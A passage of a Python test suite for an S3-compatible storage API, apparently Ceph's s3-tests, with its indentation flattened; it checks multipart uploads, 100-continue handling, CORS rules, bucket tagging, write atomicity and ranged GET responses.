_do_test_multipart_upload_contents(bucket_name, 'mymultipart', 3)
@attr(resource='object')
@attr(method='put')
@attr(operation=' multi-part upload overwrites existing key')
@attr(assertion='successful')
def test_multipart_upload_overwrite_existing_object():
bucket_name = get_new_bucket()
client = get_client()
key = 'mymultipart'
payload='12345'*1024*1024
num_parts=2
client.put_object(Bucket=bucket_name, Key=key, Body=payload)
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
for part_num in range(0, num_parts):
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num+1, Body=payload)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num+1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
test_string = _get_body(response)
assert test_string == payload*num_parts
@attr(resource='object')
@attr(method='put')
@attr(operation='abort multi-part upload')
@attr(assertion='successful')
def test_abort_multipart_upload():
bucket_name = get_new_bucket()
key="mymultipart"
objlen = 10 * 1024 * 1024
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id)
response = client.head_bucket(Bucket=bucket_name)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', 0))
eq(rgw_bytes_used, 0)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 0))
eq(rgw_object_count, 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='abort non-existent multi-part upload')
@attr(assertion='fails 404')
def test_abort_multipart_upload_not_found():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
client.put_object(Bucket=bucket_name, Key=key)
e = assert_raises(ClientError, client.abort_multipart_upload, Bucket=bucket_name, Key=key, UploadId='56788')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchUpload')
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent multi-part uploads')
@attr(assertion='successful')
def test_list_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
mb = 1024 * 1024
upload_ids = []
(upload_id1, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=5*mb)
upload_ids.append(upload_id1)
(upload_id2, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=6*mb)
upload_ids.append(upload_id2)
key2="mymultipart2"
(upload_id3, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key2, size=5*mb)
upload_ids.append(upload_id3)
response = client.list_multipart_uploads(Bucket=bucket_name)
uploads = response['Uploads']
resp_uploadids = []
for i in range(0, len(uploads)):
resp_uploadids.append(uploads[i]['UploadId'])
for i in range(0, len(upload_ids)):
eq(True, (upload_ids[i] in resp_uploadids))
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id1)
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id2)
client.abort_multipart_upload(Bucket=bucket_name, Key=key2, UploadId=upload_id3)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list multipart uploads with different owners')
@attr(assertion='successful')
def test_list_multipart_upload_owner():
bucket_name = get_new_bucket()
client1 = get_client()
user1 = get_main_user_id()
name1 = get_main_display_name()
client2 = get_alt_client()
user2 = get_alt_user_id()
name2 = get_alt_display_name()
# add bucket acl for public read/write access
client1.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
key1 = 'multipart1'
key2 = 'multipart2'
upload1 = client1.create_multipart_upload(Bucket=bucket_name, Key=key1)['UploadId']
try:
upload2 = client2.create_multipart_upload(Bucket=bucket_name, Key=key2)['UploadId']
try:
# match fields of an Upload from ListMultipartUploadsResult
def match(upload, key, uploadid, userid, username):
eq(upload['Key'], key)
eq(upload['UploadId'], uploadid)
eq(upload['Initiator']['ID'], userid)
eq(upload['Initiator']['DisplayName'], username)
eq(upload['Owner']['ID'], userid)
eq(upload['Owner']['DisplayName'], username)
# list uploads with client1
uploads1 = client1.list_multipart_uploads(Bucket=bucket_name)['Uploads']
eq(len(uploads1), 2)
match(uploads1[0], key1, upload1, user1, name1)
match(uploads1[1], key2, upload2, user2, name2)
# list uploads with client2
uploads2 = client2.list_multipart_uploads(Bucket=bucket_name)['Uploads']
eq(len(uploads2), 2)
match(uploads2[0], key1, upload1, user1, name1)
match(uploads2[1], key2, upload2, user2, name2)
finally:
client2.abort_multipart_upload(Bucket=bucket_name, Key=key2, UploadId=upload2)
finally:
client1.abort_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload1)
@attr(resource='object')
@attr(method='put')
@attr(operation='multi-part upload with missing part')
def test_multipart_upload_missing_part():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
size = 1
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=1, Body=bytes('\x00', 'utf-8'))
# 'PartNumber should be 1'
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 9999})
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidPart')
@attr(resource='object')
@attr(method='put')
@attr(operation='multi-part upload with incorrect ETag')
def test_multipart_upload_incorrect_etag():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
size = 1
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=1, Body=bytes('\x00', 'utf-8'))
# 'ETag' should be "93b885adfe0da089cdf634904fd59f71"
parts.append({'ETag': "ffffffffffffffffffffffffffffffff", 'PartNumber': 1})
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidPart')
def _simple_http_req_100_cont(host, port, is_secure, method, resource):
"""
Send the specified request w/expect 100-continue
and await confirmation.
"""
req_str = '{method} {resource} HTTP/1.1\r\nHost: {host}\r\nAccept-Encoding: identity\r\nContent-Length: 123\r\nExpect: 100-continue\r\n\r\n'.format(
method=method,
resource=resource,
host=host,
)
req = bytes(req_str, 'utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if is_secure:
s = ssl.wrap_socket(s);
s.settimeout(5)
s.connect((host, port))
s.send(req)
try:
data = s.recv(1024)
except socket.error as msg:
print('got response: ', msg)
print('most likely server doesn\'t support 100-continue')
s.close()
data_str = data.decode()
l = data_str.split(' ')
assert l[0].startswith('HTTP')
return l[1]
@attr(resource='object')
@attr(method='put')
@attr(operation='w/expect continue')
@attr(assertion='succeeds if object is public-read-write')
@attr('100_continue')
@attr('fails_on_mod_proxy_fcgi')
def test_100_continue():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
objname='testobj'
resource = '/{bucket}/{obj}'.format(bucket=bucket_name, obj=objname)
host = get_config_host()
port = get_config_port()
is_secure = get_config_is_secure()
#NOTES: this test needs to be tested when is_secure is True
status = _simple_http_req_100_cont(host, port, is_secure, 'PUT', resource)
eq(status, '403')
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
status = _simple_http_req_100_cont(host, port, is_secure, 'PUT', resource)
eq(status, '100')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set cors')
@attr(assertion='succeeds')
@attr('cors')
def test_set_cors():
bucket_name = get_new_bucket()
client = get_client()
allowed_methods = ['GET', 'PUT']
allowed_origins = ['*.get', '*.put']
cors_config ={
'CORSRules': [
{'AllowedMethods': allowed_methods,
'AllowedOrigins': allowed_origins,
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
response = client.get_bucket_cors(Bucket=bucket_name)
eq(response['CORSRules'][0]['AllowedMethods'], allowed_methods)
eq(response['CORSRules'][0]['AllowedOrigins'], allowed_origins)
client.delete_bucket_cors(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
def _cors_request_and_check(func, url, headers, expect_status, expect_allow_origin, expect_allow_methods):
r = func(url, headers=headers, verify=get_config_ssl_verify())
eq(r.status_code, expect_status)
assert r.headers.get('access-control-allow-origin', None) == expect_allow_origin
assert r.headers.get('access-control-allow-methods', None) == expect_allow_methods
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when origin header set')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_origin_response():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*suffix'],
},
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['start*end'],
},
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['prefix*'],
},
{'AllowedMethods': ['PUT'],
'AllowedOrigins': ['*.put'],
}
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
_cors_request_and_check(requests.get, url, None, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'foo.suffix'}, 200, 'foo.suffix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'foo.bar'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'foo.suffix.get'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'startend'}, 200, 'startend', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'start1end'}, 200, 'start1end', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'start12end'}, 200, 'start12end', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': '0start12end'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'prefix'}, 200, 'prefix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'prefix.suffix'}, 200, 'prefix.suffix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'bla.prefix'}, 200, None, None)
obj_url = '{u}/{o}'.format(u=url, o='bar')
_cors_request_and_check(requests.get, obj_url, {'Origin': 'foo.suffix'}, 404, 'foo.suffix', 'GET')
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'GET',
'content-length': '0'}, 403, 'foo.suffix', 'GET')
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'PUT',
'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'DELETE',
'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.put', 'content-length': '0'}, 403, 'foo.put', 'PUT')
_cors_request_and_check(requests.get, obj_url, {'Origin': 'foo.suffix'}, 404, 'foo.suffix', 'GET')
_cors_request_and_check(requests.options, url, None, 400, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.suffix'}, 400, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'bla'}, 400, None, None)
_cors_request_and_check(requests.options, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'GET',
'content-length': '0'}, 200, 'foo.suffix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'foo.bar', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.suffix.get', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'startend', 'Access-Control-Request-Method': 'GET'}, 200, 'startend', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'start1end', 'Access-Control-Request-Method': 'GET'}, 200, 'start1end', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'start12end', 'Access-Control-Request-Method': 'GET'}, 200, 'start12end', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': '0start12end', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'prefix', 'Access-Control-Request-Method': 'GET'}, 200, 'prefix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'prefix.suffix', 'Access-Control-Request-Method': 'GET'}, 200, 'prefix.suffix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'bla.prefix', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.put', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.put', 'Access-Control-Request-Method': 'PUT'}, 200, 'foo.put', 'PUT')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when origin is set to wildcard')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_origin_wildcard():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*'],
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
_cors_request_and_check(requests.get, url, None, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'example.origin'}, 200, '*', 'GET')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when Access-Control-Request-Headers is set in option request')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_header_option():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*'],
'ExposeHeaders': ['x-amz-meta-header1'],
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
obj_url = '{u}/{o}'.format(u=url, o='bar')
_cors_request_and_check(requests.options, obj_url, {'Origin': 'example.origin','Access-Control-Request-Headers':'x-amz-meta-header2','Access-Control-Request-Method':'GET'}, 403, None, None)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='put tags')
@attr(assertion='succeeds')
@attr('tagging')
def test_set_bucket_tagging():
bucket_name = get_new_bucket()
client = get_client()
tags={
'TagSet': [
{
'Key': 'Hello',
'Value': 'World'
},
]
}
e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchTagSetError')
client.put_bucket_tagging(Bucket=bucket_name, Tagging=tags)
response = client.get_bucket_tagging(Bucket=bucket_name)
eq(len(response['TagSet']), 1)
eq(response['TagSet'][0]['Key'], 'Hello')
eq(response['TagSet'][0]['Value'], 'World')
client.delete_bucket_tagging(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchTagSetError')
class FakeFile(object):
"""
file that simulates seek, tell, and current character
"""
def __init__(self, char='A', interrupt=None):
self.offset = 0
self.char = bytes(char, 'utf-8')
self.interrupt = interrupt
def seek(self, offset, whence=os.SEEK_SET):
if whence == os.SEEK_SET:
self.offset = offset
elif whence == os.SEEK_END:
self.offset = self.size + offset;
elif whence == os.SEEK_CUR:
self.offset += offset
def tell(self):
return self.offset
class FakeWriteFile(FakeFile):
"""
file that simulates interruptable reads of constant data
"""
def __init__(self, size, char='A', interrupt=None):
FakeFile.__init__(self, char, interrupt)
self.size = size
def read(self, size=-1):
if size < 0:
size = self.size - self.offset
count = min(size, self.size - self.offset)
self.offset += count
# Sneaky! do stuff before we return (the last time)
if self.interrupt != None and self.offset == self.size and count > 0:
self.interrupt()
return self.char*count
class FakeReadFile(FakeFile):
"""
file that simulates writes, interrupting after the second
"""
def __init__(self, size, char='A', interrupt=None):
FakeFile.__init__(self, char, interrupt)
self.interrupted = False
self.size = 0
self.expected_size = size
def write(self, chars):
eq(chars, self.char*len(chars))
self.offset += len(chars)
self.size += len(chars)
# Sneaky! do stuff on the second seek
if not self.interrupted and self.interrupt != None \
and self.offset > 0:
self.interrupt()
self.interrupted = True
def close(self):
eq(self.size, self.expected_size)
class FakeFileVerifier(object):
"""
file that verifies expected data has been written
"""
def __init__(self, char=None):
self.char = char
self.size = 0
def write(self, data):
size = len(data)
if self.char == None:
self.char = data[0]
self.size += size
eq(data.decode(), self.char*size)
def _verify_atomic_key_data(bucket_name, key, size=-1, char=None):
"""
Make sure file is of the expected size and (simulated) content
"""
fp_verify = FakeFileVerifier(char)
client = get_client()
client.download_fileobj(bucket_name, key, fp_verify)
if size >= 0:
eq(fp_verify.size, size)
def _test_atomic_read(file_size):
"""
Create a file of A's, use it to set_contents_from_file.
Create a file of B's, use it to re-set_contents_from_file.
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key='testobj', Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B')
fp_a2 = FakeReadFile(file_size, 'A',
lambda: client.put_object(Bucket=bucket_name, Key='testobj', Body=fp_b)
)
read_client = get_client()
read_client.download_fileobj(bucket_name, 'testobj', fp_a2)
fp_a2.close()
_verify_atomic_key_data(bucket_name, 'testobj', file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='1MB successful')
def test_atomic_read_1mb():
_test_atomic_read(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='4MB successful')
def test_atomic_read_4mb():
_test_atomic_read(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='8MB successful')
def test_atomic_read_8mb():
_test_atomic_read(1024*1024*8)
def _test_atomic_write(file_size):
"""
Create a file of A's, use it to set_contents_from_file.
Verify the contents are all A's.
Create a file of B's, use it to re-set_contents_from_file.
Before re-set continues, verify content's still A's
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
objname = 'testobj'
# create <file_size> file of A's
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
# verify A's
_verify_atomic_key_data(bucket_name, objname, file_size, 'A')
# create <file_size> file of B's
# but try to verify the file before we finish writing all the B's
fp_b = FakeWriteFile(file_size, 'B',
lambda: _verify_atomic_key_data(bucket_name, objname, file_size, 'A')
)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify B's
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='1MB successful')
def test_atomic_write_1mb():
_test_atomic_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='4MB successful')
def test_atomic_write_4mb():
_test_atomic_write(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='8MB successful')
def test_atomic_write_8mb():
_test_atomic_write(1024*1024*8)
def _test_atomic_dual_write(file_size):
"""
create an object, two sessions writing different contents
confirm that it is all one or the other
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
client.put_object(Bucket=bucket_name, Key=objname)
# write <file_size> file of B's
# but before we're done, try to write all A's
fp_a = FakeWriteFile(file_size, 'A')
def rewind_put_fp_a():
fp_a.seek(0)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B', rewind_put_fp_a)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify the file
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='1MB successful')
def test_atomic_dual_write_1mb():
_test_atomic_dual_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='4MB successful')
def test_atomic_dual_write_4mb():
_test_atomic_dual_write(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='8MB successful')
def test_atomic_dual_write_8mb():
_test_atomic_dual_write(1024*1024*8)
def _test_atomic_conditional_write(file_size):
"""
Create a file of A's, use it to set_contents_from_file.
Verify the contents are all A's.
Create a file of B's, use it to re-set_contents_from_file.
Before re-set continues, verify content's still A's
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
# create <file_size> file of A's
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B',
lambda: _verify_atomic_key_data(bucket_name, objname, file_size, 'A')
)
# create <file_size> file of B's
# but try to verify the file before we finish writing all the B's
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify B's
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='1MB successful')
@attr('fails_on_aws')
def test_atomic_conditional_write_1mb():
_test_atomic_conditional_write(1024*1024)
def _test_atomic_dual_conditional_write(file_size):
"""
create an object, two sessions writing different contents
confirm that it is all one or the other
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
fp_a = FakeWriteFile(file_size, 'A')
response = client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
_verify_atomic_key_data(bucket_name, objname, file_size, 'A')
etag_fp_a = response['ETag'].replace('"', '')
# write <file_size> file of C's
# but before we're done, try to write all B's
fp_b = FakeWriteFile(file_size, 'B')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': etag_fp_a}))
client.meta.events.register('before-call.s3.PutObject', lf)
def rewind_put_fp_b():
fp_b.seek(0)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
fp_c = FakeWriteFile(file_size, 'C', rewind_put_fp_b)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=objname, Body=fp_c)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
# verify the file
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='1MB successful')
@attr('fails_on_aws')
# TODO: test not passing with SSL, fix this
@attr('fails_on_rgw')
def test_atomic_dual_conditional_write_1mb():
_test_atomic_dual_conditional_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write file in deleted bucket')
@attr(assertion='fail 404')
@attr('fails_on_aws')
# TODO: test not passing with SSL, fix this
@attr('fails_on_rgw')
def test_atomic_write_bucket_gone():
bucket_name = get_new_bucket()
client = get_client()
def remove_bucket():
client.delete_bucket(Bucket=bucket_name)
objname = 'foo'
fp_a = FakeWriteFile(1024*1024, 'A', remove_bucket)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=objname, Body=fp_a)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='put')
@attr(operation='begin to overwrite file with multipart upload then abort')
@attr(assertion='read back original key contents')
def test_atomic_multipart_upload_write():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.create_multipart_upload(Bucket=bucket_name, Key='foo')
upload_id = response['UploadId']
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
client.abort_multipart_upload(Bucket=bucket_name, Key='foo', UploadId=upload_id)
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
class Counter:
def __init__(self, default_val):
self.val = default_val
def inc(self):
self.val = self.val + 1
class ActionOnCount:
def __init__(self, trigger_count, action):
self.count = 0
self.trigger_count = trigger_count
self.action = action
self.result = 0
def trigger(self):
self.count = self.count + 1
if self.count == self.trigger_count:
self.result = self.action()
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart check for two writes of the same part, first write finishes last')
@attr(assertion='object contains correct content')
def test_multipart_resend_first_finishes_last():
bucket_name = get_new_bucket()
client = get_client()
key_name = "mymultipart"
response = client.create_multipart_upload(Bucket=bucket_name, Key=key_name)
upload_id = response['UploadId']
#file_size = 8*1024*1024
file_size = 8
counter = Counter(0)
# upload_part might read multiple times from the object
# first time when it calculates md5, second time when it writes data
# out. We want to interject only on the last time, but we can't be
# sure how many times it's going to read, so let's have a test run
# and count the number of reads
fp_dry_run = FakeWriteFile(file_size, 'C',
lambda: counter.inc()
)
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, PartNumber=1, Body=fp_dry_run)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key_name, UploadId=upload_id, MultipartUpload={'Parts': parts})
client.delete_object(Bucket=bucket_name, Key=key_name)
# clear parts
parts[:] = []
# ok, now for the actual test
fp_b = FakeWriteFile(file_size, 'B')
def upload_fp_b():
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, Body=fp_b, PartNumber=1)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
action = ActionOnCount(counter.val, lambda: upload_fp_b())
response = client.create_multipart_upload(Bucket=bucket_name, Key=key_name)
upload_id = response['UploadId']
fp_a = FakeWriteFile(file_size, 'A',
lambda: action.trigger()
)
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, PartNumber=1, Body=fp_a)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key_name, UploadId=upload_id, MultipartUpload={'Parts': parts})
_verify_atomic_key_data(bucket_name, key_name, file_size, 'A')
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=4-7')
fetched_content = _get_body(response)
eq(fetched_content, content[4:8])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-7/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
def _generate_random_string(size):
return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_big_request_response_code():
content = _generate_random_string(8*1024*1024)
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=3145728-5242880')
fetched_content = _get_body(response)
eq(fetched_content, content[3145728:5242881])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 3145728-5242880/8388608')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_skip_leading_bytes_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=4-')
fetched_content = _get_body(response)
eq(fetched_content, content[4:])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-10/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_return_trailing_bytes_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=-7')
fetched_content = _get_body(response)
eq(fetched_content, content[-7:])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-10/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns invalid range, 416')
def test_ranged_request_invalid_range():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
# test invalid range
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='testobj', Range='bytes=40-50')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 416)
eq(error_code, 'InvalidRange')
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns invalid range, 416')
def test_ranged_request_empty_object():
content = ''
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
# test invalid range
